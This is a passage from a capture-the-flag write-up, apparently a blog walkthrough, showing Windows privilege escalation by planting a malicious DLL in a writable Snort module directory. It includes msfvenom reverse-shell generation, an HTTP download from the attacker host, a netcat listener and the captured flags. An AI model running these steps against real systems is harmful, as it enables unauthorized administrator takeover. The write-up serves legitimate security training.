0kcBSYXfHU2s7xsWA3pCtjthI0lge3SyLOMw9T81CPqT3HOIKkh3SVcO9jdrxfwu
pHnjX+5HyybuBwIQwGprgyWdGnyv3mfcQQ==
=a7bc
-----END ENCODED MESSAGE-----





Privilege Escalation

There were a few interesting breadcrumbs to follow in the post-exploit enumeration, namely:

  • BCTextEncoder
    • In my enumeration, this was just used to spawn login sessions for jdoe
  • The webservice credential
    • In my enumeration, this is a dead end
  • The jdoe WinRM user
    • I did find a credential for jdoe, but we actually don't need to pivot to this user
  • The SnortSvc service

Snort

Enumerating the Service

Since we know the SnortSvc service is running with administrative privileges, it makes sense to look there first. At first glance, the service path may look like an unquoted service path, but this is not the case.

Much in the same way you'd look at writable systemd unit file directories on a Linux host, you should look for writable service directories on a Windows host. I came up with this PowerShell one-liner to enumerate the C:\Snort directory:

Get-ChildItem -Recurse C:\Snort | ForEach-Object { Write-Host $_.FullName ; Write-Host '' ; Get-Acl $_.FullName | Select-Object -ExpandProperty Access | Where-Object {$_.IdentityReference -eq 'BUILTIN\Utilisateurs' -and $_.FileSystemRights -notlike '*Read*'} | Format-List FileSystemRights, IdentityReference, AccessControlType}

This one-line is doing the following:

  • Recurse into C:\Snort and get all files and directories
  • Pipe to Get-Acl and look at the Access property of the ACL objects
  • Filter on Access rights where applies to the BUILTIN\Users (in French on the target) and filter out any rights with Read, since that's not interesting in this case
  • Finally, output in list format any access rights on files and/or folders

You'll notice right away that we have AppendData and CreateFiles permissions as low-level users on a a lot of interesting directories.

If you look at the C:\Snort\etc\snort.conf file, you'll see a particular directory that's ripe for abuse.

If — as instructed in the configuration file — you reference the Snort manual, you'll see that Snort allows developers and admins to place custom modules to extend the capabilities of Snort.

You'll notice that the naming convention appears to be sf_ + proto.dll. Following this convention, we should be able to obtain a reverse shell.



Reverse Shell as Administrator

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f dll -o sf_pwn.dll
Generate the malicious .dll
sudo rlwrap nc -lnvp 443

Start a TCP listener

sudo python3 -m http.server 80

Serve the malicious .dll over HTTP

Invoke-WebRequest http://10.10.14.15/sf_pwn.dll -o sf_pwn.dll

Download the malicious .dll into the target directory

Be patient, it takes a moment for Snort to reload the DLLs
💡
We skipped a level by going straight to Administrator. You can find the user flag with PowerShell. First, run powershell.exe. Then, run ls -recurse -filter 'user.txt' C:\Users.





Flags

User

f3f353dafd064476b25e8a2e0ef45b32    

Root

db1297ecd96a5d66f15ba2946c6aa497    
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.